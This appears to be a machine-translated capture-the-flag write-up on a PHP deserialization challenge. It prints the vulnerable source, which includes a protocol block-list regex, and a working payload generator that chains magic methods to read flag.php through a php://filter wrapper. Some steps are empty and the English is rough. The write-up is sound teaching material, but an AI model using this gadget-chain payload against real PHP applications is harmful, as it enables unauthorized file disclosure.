1. I think the Internet is all about this problem and pop chain of , I started to write a relatively complete about this part last week PHP Deserialization summary , It is expected to be released this week , So my analysis of this topic is completely based on the premise of not knowing this knowledge

2. Open the web link , Give us the code directly , This is not the source code audit , Direct dry pulling ：

   Here I suggest you take a look at PHP edition , Because some vulnerabilities are valid under certain versions

   <?php
       //flag is in flag.php
       //WTF IS THIS?
       //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
       //And Crack It!
       class Modifier {
         
           protected  $var;
           public function append($value){
         
               include($value); #  utilize  include  Function 
           }
           public function __invoke(){
           //  Fires when an attempt is made to call an object as a function 
               $this->append($this->var);  #  The second step ： When  Test  When calling you, you will execute and then include  flag.php  file 
           }
       }
   
       class Show{
         
           public $source;
           public $str;
           public function __construct($file='index.php'){
           // Triggered when an object is created 
               $this->source = $file;
               echo 'Welcome to '.$this->source."<br>"; 
           }
           public function __toString(){
         
               return $this->str->source;  #  The third step ：  If pop->source Medium source It's a Show class , Then it will execute __tostring class , This is because of the  echo 'Welcome to '.$this->source."<br>";  Isn't it called here 
           }  
   
           public function __wakeup(){
           // perform unserialize() when , This function will be called first 
               if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
         
                   echo "hacker";
                   $this->source = "index.php";
               }
           }
       }
   
       class Test{
         
           public $p;
           public function __construct(){
          // Triggered when an object is created 
               $this->p = array();
           }
   
           public function __get($key){
            #  When we try to get an unreachable property ( such as private), Class will automatically call __get function , Or another attribute that is not it 
               $function = $this->p;
               return $function();   #  The first step is to use this call  Modifier  This class 
           }
       }
   
       if(isset($_GET['pop'])){
         
           @unserialize($_GET['pop']); //  Deserialization 
       }
       else{
         
           $a=new Show;
           highlight_file(__FILE__);
       } 
   ?>
   

   For the content of code audit , I have written it in the code

3. Summarize the ideas after code audit ：
   
   

4. Now the idea is , Yes payload Design ：

   	<?php
       class Modifier {
         
           protected  $var="php://filter/read=convert.base64-encode/resource=flag.php";
       }
   
       class Show{
         
           public $source;
           public $str;
       }
   
       class Test{
         
           public $p ;
       }
       $a = new Show();
       $a->source  = new Show();
       $a->source->str = new Test();
       $a->source->str->p=new Modifier();
       echo urlencode(serialize($a));
   ?>
   

   Some people may wonder why url code , This is because Modifier The property of is protected You must know about PHP Of proteced and private There are some special codes after serialization of , To prevent the impact of this , So we code it

5. Access page ：
   
   Then proceed Decode it

summary

1. You must be patient when auditing code